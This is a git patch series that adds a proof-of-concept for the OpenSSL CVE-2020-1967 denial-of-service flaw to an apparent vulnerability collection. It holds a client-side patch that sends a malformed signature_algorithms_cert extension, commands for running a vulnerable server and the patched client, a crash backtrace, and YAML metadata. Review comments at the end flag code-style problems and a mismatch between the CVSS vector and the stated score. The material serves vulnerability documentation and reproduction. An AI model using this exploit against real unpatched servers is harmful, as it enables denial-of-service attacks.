From 59f80cd582f10cf2aa155fc0dd628242888ec797 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A5=BD=E5=90=8D=E5=AD=97?= Date: Sat, 15 Apr 2023 08:14:51 +0000 Subject: [PATCH 1/2] CVE-2020-1967 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 好名字 --- .../2020/CVE-2020-1967/CVE-2020-1967.patch | 34 +++++++ cve/openssl/2020/CVE-2020-1967/README.md | 89 +++++++++++++++++++ cve/openssl/2020/yaml/CVE-2020-1967.yaml | 20 +++++ 3 files changed, 143 insertions(+) create mode 100644 cve/openssl/2020/CVE-2020-1967/CVE-2020-1967.patch create mode 100644 cve/openssl/2020/CVE-2020-1967/README.md create mode 100644 cve/openssl/2020/yaml/CVE-2020-1967.yaml diff --git a/cve/openssl/2020/CVE-2020-1967/CVE-2020-1967.patch b/cve/openssl/2020/CVE-2020-1967/CVE-2020-1967.patch new file mode 100644 index 00000000..b2605a5a --- /dev/null +++ b/cve/openssl/2020/CVE-2020-1967/CVE-2020-1967.patch 
@@ -0,0 +1,34 @@ +*** openssl-1.1.1d/ssl/statem/extensions_clnt.c Tue Sep 10 13:13:07 2019 +--- openssl-1.1.1d-patched/ssl/statem/extensions_clnt.c Tue Apr 28 21:11:20 2020 +*************** EXT_RETURN tls_construct_ctos_sig_algs(S +*** 272,277 **** +--- 272,300 ---- + return EXT_RETURN_NOT_SENT; + + salglen = tls12_get_psigalgs(s, 1, &salg); ++ ++ ++ /* ++ // signature_algorithms_cert ++ */ ++ const uint16_t non_existent = 0x1234; ++ fprintf(stderr,"Sending CVE-2020-1967 payload\n"); ++ if (!WPACKET_put_bytes_u16(pkt, TLSEXT_TYPE_signature_algorithms_cert) ++ // Sub-packet for sig-algs extension ++ || !WPACKET_start_sub_packet_u16(pkt) ++ // Sub-packet for the actual list ++ || !WPACKET_start_sub_packet_u16(pkt) ++ || (!WPACKET_put_bytes_u16(pkt, non_existent)) ++ || !WPACKET_close(pkt) ++ || !WPACKET_close(pkt)) { ++ SSLfatal(s, SSL_AD_INTERNAL_ERROR, SSL_F_TLS_CONSTRUCT_CTOS_SIG_ALGS, ++ ERR_R_INTERNAL_ERROR); ++ return EXT_RETURN_FAIL; ++ } ++ ++ /* ++ // original signature_algorithms: ++ */ + if (!WPACKET_put_bytes_u16(pkt, TLSEXT_TYPE_signature_algorithms) + /* Sub-packet for sig-algs extension */ + || !WPACKET_start_sub_packet_u16(pkt) \ No newline at end of file diff --git a/cve/openssl/2020/CVE-2020-1967/README.md b/cve/openssl/2020/CVE-2020-1967/README.md new file mode 100644 index 00000000..180c7589 --- /dev/null +++ b/cve/openssl/2020/CVE-2020-1967/README.md 
@@ -0,0 +1,89 @@ +# CVE-2020-1967 +Proof of concept exploit about OpenSSL signature_algorithms_cert DoS flaw (CVE-2020-1967). Credit for the original finding to Bernd Edlinger, additional analysis by Matt Caswell and Benjamin Kaduk, this demo by Imre Rad. + +## Prerequisite + +Server or client applications that call the `SSL_check_chain()` function during or after a TLS 1.3 handshake. According to the documentation, `SSL_check_chain()` checks whether certificate x, private key pk and certificate chain chain is suitable for use with the current session s. This function call is NOT present in the popular Apache httpd or Nginx projects. + +## Demo + +To exploit this vulnerability, a crafted signature_algorithms_cert TLS extension needs to be submitted as part of the Hello message. I used a patched version of the openssl library to build such a client; the server is the built-in s_server openssl app, along with the -x options to activate the code path that invokes `SSL_check_chain`. + +Setting up the server on a Debian stable (using the vulnerable version explicitly): + +``` +root@489def7f3594:/data# apt install libssl1.1=1.1.1d-0+deb10u2 openssl=1.1.1d-0+deb10u2 +... + +root@489def7f3594:/data# openssl version +OpenSSL 1.1.1d 10 Sep 2019 + +root@489def7f3594:/data# openssl s_server -cert cert.pem -key key.pem -accept 8443 -verify 1 -tls1_3 -xkey key.pem -xcert cert.pem -xchain cert.pem +verify depth is 1 +Using default temp DH parameters +ACCEPT +``` + +Sending the payload using the patched client: + +``` +root@489def7f3594:/data# /path/to/patched/openssl s_client -connect 127.0.0.1:8443 -tls1_3 -cert cert.pem -key key.pem -sigalgs rsa_pss_rsae_sha256 +CONNECTED(00000004) +Sending CVE-2020-1967 payload +... +``` + +And the server is supposed to segfault at this point. The core looks like this: +``` +root@489def7f3594:/data/1# gdb /data/openssl-1.1.1d/apps/openssl core +GNU gdb (Ubuntu 9.1-0ubuntu1) 9.1 +Copyright (C) 2020 Free Software Foundation, Inc. 
+License GPLv3+: GNU GPL version 3 or later +This is free software: you are free to change and redistribute it. +There is NO WARRANTY, to the extent permitted by law. +Type "show copying" and "show warranty" for details. +This GDB was configured as "x86_64-linux-gnu". +Type "show configuration" for configuration details. +For bug reporting instructions, please see: +. +Find the GDB manual and other documentation resources online at: + . + +For help, type "help". +Type "apropos word" to search for commands related to "word"... +Reading symbols from /data/openssl-1.1.1d/apps/openssl... +(No debugging symbols found in /data/openssl-1.1.1d/apps/openssl) +[New LWP 26319] +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". +Core was generated by `/data/openssl-1.1.1d/apps/openssl s_server -cert cert.pem -key key.pem -accept'. +Program terminated with signal SIGSEGV, Segmentation fault. +#0 0x00007f09bcff3770 in tls1_check_sig_alg.part.0.cold () from /data/openssl-1.1.1d/libssl.so +(gdb) bt +#0 0x00007f09bcff3770 in tls1_check_sig_alg.part.0.cold () from /data/openssl-1.1.1d/libssl.so +#1 0x00007f09bd03f309 in tls1_check_chain () from /data/openssl-1.1.1d/libssl.so +#2 0x00007f09bd403fc8 in set_cert_cb () +#3 0x00007f09bd037f75 in tls_post_process_client_hello () from /data/openssl-1.1.1d/libssl.so +#4 0x00007f09bd02703f in state_machine.part () from /data/openssl-1.1.1d/libssl.so +#5 0x00007f09bcffa3f8 in ssl3_write_bytes () from /data/openssl-1.1.1d/libssl.so +#6 0x00007f09bd00fbb9 in ssl_write_internal () from /data/openssl-1.1.1d/libssl.so +#7 0x00007f09bd00fd07 in SSL_write () from /data/openssl-1.1.1d/libssl.so +#8 0x00007f09bd3e337d in sv_body () +#9 0x00007f09bd40757a in do_server () +#10 0x00007f09bd3e7c27 in s_server_main () +#11 0x00007f09bd3cea46 in do_cmd () +#12 0x00007f09bd3b89fd in main () +``` + +## Affected versions + +Affected versions are: OpenSSL 1.1.1d, 1.1.1e, and 1.1.1f. 
+The first fixed version is OpenSSL 1.1.1g. + +## References + +- https://www.openssl.org/news/secadv/20200421.txt + +- https://github.com/openssl/openssl/issues/11500 + +- https://github.com/openssl/openssl/commit/a87f3fe01a5a894aa27ccd6a239155fd129988e4 diff --git a/cve/openssl/2020/yaml/CVE-2020-1967.yaml b/cve/openssl/2020/yaml/CVE-2020-1967.yaml new file mode 100644 index 00000000..d6a4d700 --- /dev/null +++ b/cve/openssl/2020/yaml/CVE-2020-1967.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-1967 +source: + https://github.com/irsl/CVE-2020-1967 +info: + name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 + severity: high + description: | + 在 TLS 1.3 握手期间或之后调用 SSL_check_chain() 函数的服务器或客户端应用程序可能会由于不正确处理“signature_algorithms_cert”TLS 扩展而导致 NULL 指针取消引用而崩溃。如果从对等方收到无效或无法识别的签名算法,则会发生崩溃。恶意对等方可利用此漏洞进行拒绝服务攻击。 + scope-of-influence: + OpenSSL 1.1.1d 到 1.1.1f + reference: + - https://nvd.nist.gov/vuln/detail/cve-2020-1967 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H + cvss-score: 7.5 + cve-id: CVE-2020-1967 + cwe-id: CWE-476 + cnvd-id: None + kve-id: None + tags: 拒绝服务,DoS \ No newline at end of file -- Gitee From a65f980d896d8ff34a52c66b5a1af079f8fb5792 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A5=BD=E5=90=8D=E5=AD=97?= Date: Sat, 15 Apr 2023 08:23:16 +0000 Subject: [PATCH 2/2] CVE-2020-1967 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 好名字 --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index a39bab91..8788f632 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -142,6 +142,7 @@ cve: - CVE-2022-0778 - CVE-2022-3786 - CVE-2016-2107 + - CVE-2020-1967 joomla: - CVE-2023-23752 libxml2: -- Gitee
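Review bot: In cve/openssl/2020/CVE-2020-1967/CVE-2020-1967.patch, the block added to tls_construct_ctos_sig_algs() has no guard around it. Any program linked against a libssl built with this patch sends the signature_algorithms_cert extension carrying 0x1234, and prints "Sending CVE-2020-1967 payload" to stderr from inside the library, whenever the function gets past the early `return EXT_RETURN_NOT_SENT;`. Put the block behind a compile-time guard so the test build cannot be mistaken for a normal client. Move `const uint16_t non_existent = 0x1234;` to the top of the function, because it currently follows the `salglen = tls12_get_psigalgs(s, 1, &salg);` statement. The added comments nest `//` inside `/* */` and place `//` inside the if condition, which differs from the `/* Sub-packet for sig-algs extension */` style in the unchanged context. The file also ends without a trailing newline.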
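Review bot: In cve/openssl/2020/CVE-2020-1967/README.md, the Demo section says the client is "a patched version of the openssl library" and runs `/path/to/patched/openssl`, but it never mentions CVE-2020-1967.patch, which is added in this same commit, or how to apply it. Add a short build section stating that the patch is a context diff against openssl-1.1.1d/ssl/statem/extensions_clnt.c and which source tree it applies to. "The -x options" would be clearer as the `-xkey`, `-xcert` and `-xchain` flags that the server command actually uses. The gdb start-up banner (licence and help text) can be trimmed so that the listing shows only the SIGSEGV line and the backtrace. The Affected versions section names 1.1.1g as the first fixed version but gives no guidance on checking an installed build, so a line pointing at the `openssl version` output shown earlier would help readers who only need to confirm exposure.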
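Review bot: In cve/openssl/2020/yaml/CVE-2020-1967.yaml, `cvss-metrics` and `cvss-score` do not agree: the vector `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H` computes to a base score of 6.5 (medium), not the 7.5 given in `cvss-score` and implied by `severity: high`. The `I:L` component also conflicts with the `description`, which describes only a crash from a NULL pointer dereference. Re-check the vector against the NVD entry already listed under `reference` and correct whichever field is wrong. `info.name` holds a product description rather than a name for the vulnerability, and `reference` omits the OpenSSL advisory and upstream commit that the README in this commit cites. The file also ends without a trailing newline.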